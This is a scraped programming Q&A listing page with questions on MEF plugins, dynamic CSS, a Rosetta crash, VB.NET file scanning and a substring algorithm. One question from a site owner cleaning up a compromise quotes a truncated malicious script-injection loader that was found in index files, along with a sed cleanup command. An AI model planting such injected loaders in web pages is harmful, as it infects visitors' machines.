    But this doesn't make any sense, because why would I want to create the instance of CandySettings in the plugin? It should be in the App. But if I put it in the App code, then the Plugin doesn't magically figure out how to get at ICandySettings, even though I am using [Import] in the plugin and [Export] in CandySettings. The way I did it was to use MEF's DirectoryCatalog, because this allows the plugin, when constructed, to scan all of the assemblies in the current folder and automagically import everything that is marked with the [Import] attribute. So it looks like this, potentially in every plugin:

    var catalog = new DirectoryCatalog(".");
    var container = new CompositionContainer(catalog);
    container.ComposeParts(this);

    This totally works great, but I can't help but think that this is not how MEF was intended to be used?

    Read the article

  • Best practice for defining CSS rules via JavaScript

    - by Tim Whitlock
    I'm loading a stylesheet that is only required when JavaScript is enabled. More to the point, it mustn't be present if JavaScript is disabled. I'm doing this as soon as possible (in the head), before any JavaScript libraries are loaded. (I'm loading all scripts as late as possible.) The code for loading this stylesheet externally is simple, and looks like this:

    var el = document.createElement('link');
    el.setAttribute('href','/css/noscript.css');
    el.setAttribute('rel','stylesheet');
    el.setAttribute('type','text/css');
    document.documentElement.firstChild.appendChild(el);

    It's working fine, but all my CSS file contains at the moment is this:

    .noscript { display: none; }

    This doesn't really warrant loading a file, so I'm thinking of just defining the rule dynamically in JavaScript. What's best practice for this? A quick scan of various techniques shows that it requires a fair bit of cross-browser hacking. P.S. pleeease don't post jQuery examples. This must be done with no libraries.

    Read the article

  • How do I debug a crash when I run my garbage-collected app in Rosetta?

    - by Rob Keniger
    I have a Universal app which is targeting 10.5 and which uses garbage collection. I am building for ppc, i386 and x86_64. I don't have access to a physical PowerPC machine, so I am trying to use Rosetta to confirm that the PowerPC portion of the app works correctly. However, as soon as the app is launched in Rosetta it immediately crashes with the following crash log:

    Process: FooApp [91567]
    Path: /Users/rob/Development/src/FooApp/build/Release 64-bit/FooApp.app/Contents/MacOS/FooApp
    Identifier: com.companyX.FooApp
    Version: 0.9 (build d540e05) (2)
    Code Type: PPC (Translated)
    Parent Process: launchd [708]
    Date/Time: 2010-04-09 18:32:23.962 +1000
    OS Version: Mac OS X 10.6.3 (10D573)
    Report Version: 6
    Exception Type: EXC_CRASH (SIGTRAP)
    Exception Codes: 0x0000000000000000, 0x0000000000000000
    Crashed Thread: 5
    ...snip non-relevant threads...
    Thread 5 Crashed:
    0 libSystem.B.dylib 0x8023656a __pthread_kill + 10
    1 libSystem.B.dylib 0x80235e17 pthread_kill + 95
    2 com.companyX.FooApp 0xb80bfb30 0xb8000000 + 785200
    3 com.companyX.FooApp 0xb80c0037 0xb8000000 + 786487
    4 com.companyX.FooApp 0xb80dd8e8 0xb8000000 + 907496
    5 com.companyX.FooApp 0xb8145397 spin_lock_wrapper + 1791
    6 com.companyX.FooApp 0xb801ceb7 0xb8000000 + 118455

    I have used the Apple docs on debugging translated apps and the information on this page to attach gdb to the app when it's running in Rosetta. The app immediately breaks into the debugger upon launch:

    Program received signal SIGTRAP, Trace/breakpoint trap.
    [Switching to thread 15107]
    0x9151fdd4 in auto_fatal ()
    (gdb) bt
    #0 0x9151fdd4 in auto_fatal ()
    #1 0x91536d84 in Auto::Thread::get_register_state ()
    #2 0x915372f8 in Auto::Thread::scan_other_thread ()
    #3 0x91529be4 in Auto::Zone::scan_registered_threads ()
    #4 0x91539114 in Auto::MemoryScanner::scan_thread_ranges ()
    #5 0x9153b000 in Auto::MemoryScanner::scan ()
    #6 0x9153049c in Auto::Zone::collect ()
    #7 0x915198f4 in auto_collect_internal ()
    #8 0x9151a094 in auto_collection_work ()
    #9 0x96687434 in _dispatch_call_block_and_release ()
    #10 0x9668912c in _dispatch_queue_drain ()
    #11 0x96689350 in _dispatch_queue_invoke ()
    #12 0x966895c0 in _dispatch_worker_thread2 ()
    #13 0x966896fc in _dispatch_worker_thread ()
    #14 0x965a97e8 in _pthread_body ()
    (gdb)

    I have no idea where to start with this. It looks like the Garbage Collector is failing very badly. Are garbage-collected PowerPC apps not supported in Rosetta? I can't see any mention of this limitation in the docs if so. Does anyone have any ideas?

    Read the article

  • Verifying regular expression for malware removal

    - by Legend
    Unfortunately, one of my web servers was compromised recently. I have two questions. First, is there a way I can scan the downloaded directory for backdoors, and is there anything I can do to ensure that at least known vulnerabilities no longer exist? Secondly, the malware put up the following in all index.* files on my webserver:

    <script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',.... CODE DELETED FOR SAFETY.... );}} catch(e) {}</script>

    Obviously, this snippet seems to download some rogue file onto the user's machine. I downloaded an entire backup of the web server and am currently trying to remove this snippet from all files. For this I am doing:

    find ./ -name "index.*" -exec sed -i 's/<script>\/\*GNU GPL\*.*Hva23p3hnyirlpv7.*<\/script>//g' {} \;

    Just wanted to verify that this does the trick. I checked it with a few files, but I want to be sure that it doesn't delete some valid code. Can anyone suggest any other modifications?

    Read the article

  • FileSystem.GetFiles() + UnauthorizedAccessException error?

    - by OverTheRainbow
    Hello, it seems like FileSystem.GetFiles() is unable to recover from the UnauthorizedAccessException that .NET throws when it tries to access an off-limits directory. In that case, does it mean this class/method isn't useful when scanning a whole drive, and I should use some other solution (in which case: which one?)? Here's some code to show the issue:

    Private Sub bgrLongProcess_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles bgrLongProcess.DoWork
        Dim drive As DriveInfo
        Dim filelist As Collections.ObjectModel.ReadOnlyCollection(Of String)
        Dim filepath As String

        'Scan all fixed drives for MyFiles.*
        For Each drive In DriveInfo.GetDrives()
            If drive.DriveType = DriveType.Fixed Then
                Try
                    'How to handle "Access to the path 'C:\System Volume Information' is denied." error?
                    filelist = My.Computer.FileSystem.GetFiles(drive.ToString, FileIO.SearchOption.SearchAllSubDirectories, "MyFiles.*")
                    For Each filepath In filelist
                        DataGridView1.Rows.Add(filepath.ToString, "temp")
                        'Trigger ProgressChanged() event
                        bgrLongProcess.ReportProgress(0, filepath)
                    Next filepath
                Catch Ex As UnauthorizedAccessException
                    'How to ignore this directory and move on?
                End Try
            End If
        Next drive
    End Sub

    Thank you.

    Edit: What about using a Try/Catch just to have GetFiles() fill the array, ignore the exception and just resume?

    Private Sub bgrLongProcess_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles bgrLongProcess.DoWork
        'Do lengthy stuff here
        Dim filelist As Collections.ObjectModel.ReadOnlyCollection(Of String)
        Dim filepath As String

        filelist = Nothing
        Try
            filelist = My.Computer.FileSystem.GetFiles("C:\", FileIO.SearchOption.SearchAllSubDirectories, "MyFiles.*")
        Catch ex As UnauthorizedAccessException
            'How to just ignore this off-limits directory and resume searching?
        End Try

        '"Object reference not set to an instance of an object" here (filelist stays Nothing after the exception)
        For Each filepath In filelist
            bgrLongProcess.ReportProgress(0, filepath)
        Next filepath
    End Sub
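    GetFiles() aborts the whole search at the first denied directory, so the usual workaround is to walk the tree yourself and swallow the access error per entry instead of per drive. A sketch of that pattern in Java NIO (Java rather than VB.NET, purely to illustrate the idea; the drive and file pattern are the ones from the question):

        import java.io.IOException;
        import java.nio.file.*;
        import java.nio.file.attribute.BasicFileAttributes;

        public class FindFiles {
            public static void main(String[] args) throws IOException {
                Files.walkFileTree(Paths.get("C:\\"), new SimpleFileVisitor<Path>() {
                    @Override
                    public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) {
                        if (file.getFileName().toString().startsWith("MyFiles.")) {
                            System.out.println(file); // report a match, keep walking
                        }
                        return FileVisitResult.CONTINUE;
                    }
                    @Override
                    public FileVisitResult visitFileFailed(Path file, IOException exc) {
                        return FileVisitResult.CONTINUE; // skip the unreadable entry, don't abort
                    }
                });
            }
        }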

    Read the article

  • shortest digest of a string

    - by meta
    [Description] Given a string of char type, find a shortest digest, which is defined as: a shortest sub-string which contains all the characters in the original string. [Example] A = "aaabedacd"; B = "bedac" is the answer. [My solution]
    1. Define an integer table with 256 elements, used to record the number of occurrences of each kind of character in the current sub-string.
    2. Scan the whole string once, counting the total kinds of characters in the given string using the above table.
    3. Use two pointers, start and end, initially pointing to the start and (start + 1) of the given string. The current kinds of character is 1.
    4. Expand sub-string [start, end) at the end until it contains all kinds of characters. Update the shortest digest if possible.
    5. Contract sub-string [start, end) at the start by one character each time, restoring its digest property when necessary by step 4.
    The time cost is O(n), and the extra space cost is constant. Any better solution without extra space?
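    A sketch of that two-pointer scheme in Java; the method name is illustrative, and it assumes the 256-entry tables from the description (i.e. 8-bit characters):

        public class Digest {
            static String shortestDigest(String s) {
                boolean[] seen = new boolean[256];
                int kinds = 0; // total kinds of characters in s (one scan)
                for (int i = 0; i < s.length(); i++)
                    if (!seen[s.charAt(i)]) { seen[s.charAt(i)] = true; kinds++; }
                int[] have = new int[256]; // occurrences inside the current window
                int covered = 0, start = 0, bestStart = 0, bestLen = Integer.MAX_VALUE;
                for (int end = 0; end < s.length(); end++) {
                    if (have[s.charAt(end)]++ == 0) covered++; // expand at the end
                    while (covered == kinds) { // window is a digest: record, then shrink
                        if (end - start + 1 < bestLen) {
                            bestLen = end - start + 1;
                            bestStart = start;
                        }
                        if (--have[s.charAt(start++)] == 0) covered--;
                    }
                }
                return s.substring(bestStart, bestStart + bestLen);
            }
            // shortestDigest("aaabedacd") returns "bedac"
        }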

    Read the article

< Previous Page | 100 101 102 103 104 105 106 107 108 109 110 111  | Next Page >